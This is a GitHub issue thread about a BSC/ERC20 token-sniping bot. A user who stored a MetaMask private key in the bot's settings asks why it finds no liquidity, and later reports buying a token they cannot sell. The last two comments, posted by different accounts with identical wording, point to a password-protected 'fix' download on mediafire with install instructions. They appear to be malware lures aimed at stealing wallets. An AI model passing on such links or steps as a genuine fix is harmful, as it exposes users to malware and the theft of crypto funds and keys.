### ISSUE TITLE
The v1.5 code has been waiting for Liquidity

### ISSUE THREAD

**Issue by Songhan17** [DexSniping/DexSniping-BSC-ERC20-Telegram-Alerts#10]
hello，I have been waiting for a whole afternoon, but there is no change. I can't judge whether it is working normally. Do I need to make any changes?
![image](https://github.com/DexSniping/DexSniping-BSC-ERC20-Telegram-Alerts/assets/62863341/8763ab7c-dc6d-42bb-bfae-2d88b485b7b0)

**Comment by DexSniping** [comment]
Hello!

Can you drop the contract you try to interact? Because it's probably a v3 Liq, you can check here: https://github.com/DexSniping/DexSniping-BSC-ERC20-Telegram-Alerts/issues/9

Thanks!

**Comment by Songhan17** [comment]
i just cloned the latest code and changed the metamask_address and metamask_private_key of settings.json without doing anything else. Won't it automatically find the liquidity pool?

**Comment by DexSniping** [comment]
@Songhan17 I speak about the token you want to buy :)

**Comment by Songhan17** [comment]
emm.. I still don't understand :(I just want to run normally and automatically find the liquidity pool of bsc... , thank you very much. I got it

**Comment by DexSniping** [comment]
@Songhan17 You said: you waiting the liquidity. But which token? You try to snipe a token no? Send me the contract address

**Comment by Songhan17** [comment]
I may have misunderstood, I thought was looking for any pool that had just been added to uni, as long as bnb was used to swap, so I didn't need to know the contract address, like sniper of solana

**Comment by DexSniping** [comment]
@Songhan17 Ah nono, you need to put the contract token address in the bot. With it, you can snipe the liquidity if it's a new token to be the first to buy. Also, you can "Take profit" and "Stop loss" if you have already bought the token (don't forget to add "-nb" to not buy the token again!)

**Comment by Songhan17** [comment]
hello,I bought tokens in pancakeswap, but I can't sell them, is there any way?
![image](https://github.com/DexSniping/DexSniping-BSC-ERC20-Telegram-Alerts/assets/62863341/1ef6dbbb-ac0d-4019-b6ba-7a89699165ea)
so sad:(

**Comment by DexSniping** [comment]
Yes, you need to increase your slippage like the screenshot said ^^
You can use the bot to do that!
Watch out, it can be a scam too... try it here: https://tokensniffer.com/

**Comment by Songhan17** [comment]
What if it turns out to be a scam...is there any way to undo the damage?

**Comment by DexSniping** [comment]
@Songhan17 Sadly, no... If they rug the token, it's impossible...

**Comment by Songhan17** [comment]
all right..all I can do is watch them sell, and I can't sell :(  , thanks again

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
